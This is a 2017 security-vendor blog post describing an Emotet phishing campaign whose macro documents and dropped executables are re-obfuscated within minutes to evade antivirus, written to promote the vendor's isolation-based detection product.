Blog Phishing Trojan Campaign Picks Up Pace, Morphing at Scale to Defeat Legacy Detection

Fresh phish

November 13, 2017 Category: Breaking News, Threats By: Matthew Rowen Comments: 0

Phishing Trojan Campaign Picks Up Pace, Morphing at Scale to Defeat Legacy Detection

  • Phishing attacks are nothing new, but we are noticing a new trend for polymorphism.
  • Bad guys are wrapping both the document and the dropped executable.
  • In samples that are literally minutes old, we see the control server is re-obfuscating and updating the malware faster than anti-virus programs are updating their awareness.

The changes made to this phishing expedition are more than trivial substitution. As a result, there’s nothing in your perimeter or endpoint AV that’s preventing the malicious document from reaching end users and infecting them. It is only possible to detect this kind of fresh malware after you’ve become infected.

Watch Bromium stop ransomware.

Here’s one example we saw earlier today. It’s a fairly standard phishing template and, using data stolen by the Trojan from other infected machines, pretends to be from a friend or acquaintance of the recipient. The email encourages the potential victim to click a link to download an alleged invoice.

Phishing template encourages the potential victim to click a link to download an alleged invoice

Upon clicking the link, a document will download. This is what the email led the user to expect, so they will click on it. Here is the malicious document running inside a micro-VM, opened in front of the user who clicked on the phishing link:

Social engineering to trick users into turning macros on if they have been disabled

Again, this is fairly standard; and as we see so often, the malware scarily detonates without any user interaction at all. As is often the case, there’s some social engineering to trick users into turning macros on if they have been disabled.

Using Bromium Secure Platform, this document has been isolated in a lightweight micro-VM. This is transparent to the user, but our hardware-based isolation allows us to safely continue execution of the malicious code, giving us a unique insight into what it is doing. This analysis is instantly fed back to our customer’s security team.

Here is a view of our analysis of this sample, instantly available via our on-premise console:

A full drill-down into the behaviour is immediately available

A full drill-down into the behavior is immediately available, and in this case we can see the malware migrating processes (each swim lane is a new process). Along the way, a freshly repacked executable is dropped and executed – again this pattern of drop-and-execute is very typical with malware, but in this case the executable has been repacked and is unknown by the majority of anti-virus products because it’s so fresh.

Ultimately this malware installs a Windows service called “sysservice.exe” which contains the Emotet banking Trojan.

Here is what the major AV engines thought of the downloaded document, as reported by Virus Total at the time it was served. Of course, over time this particular document will be known to more AV tools. But by then, the control server will be serving fresh new versions that are undetected.

Major AV engines mostly missed the Trojan

Similarly, the dropped executable was largely undetected when we saw it – 50 of 66 engines failed to see bad. This is an interesting development as polymorphic documents have been seen extensively, but we generally see them drop binaries that were already known from previous campaigns. So this frequent repacking is an interesting trend.

Ultimately as malware matures, users will be served samples that have been automatically made specifically for them and are totally unknown in the wild – they won’t be stopped at the perimeter or found on the endpoint by legacy tools.

The re-obfuscation is interesting too. The authors have not made simple substitutions (which is all that would be required to defeat a solution relying on signatures) but are making random structural changes in a full re-obfuscation.

This can be seen in the observed PowerShell invocation, which is part of the early process migration:

Observed PowerShell invocation early in the process migration

Compared with a sample delivered from the same URL a few minutes later:

The authors are making random structural changes in a full re-obfuscation

Bromium users are protected from this campaign, and other Zero-day outbreaks, by our unique hardware-based isolation. Our behavioral analysis also allows the malicious activity to be detected even when freshly repacked and re-obfuscated. We provide full forensic information immediately, and because we are able to wait until the malware has actually done something provably bad before creating an alert, we don’t annoy customers with false alarms. Users dependent on legacy AV or signature-based detection may fall victim to this and similar campaigns.

If you want to learn about Bromium Secure Platform, contact us to request a demo.


Enter your email address to receive notifications.

About the Author

Matthew Rowen

Matthew Rowen
Member of Technical Staff, Engineering at Bromium

Recent Posts

2017-11-13T14:48:25+00:00November 13th, 2017|Breaking News, Threats|

Leave A Comment

See Bromium in Action

Request a demo and see how Bromium isolation will put an end to malware and attacks once and for all.

Request a Demo

By continuing to use the site, you agree to the use of cookies. More information

The cookie settings on this website are set to "allow cookies" to give you the best browsing experience possible. If you continue to use this website without changing your cookie settings or you click "Accept" below then you are consenting to this.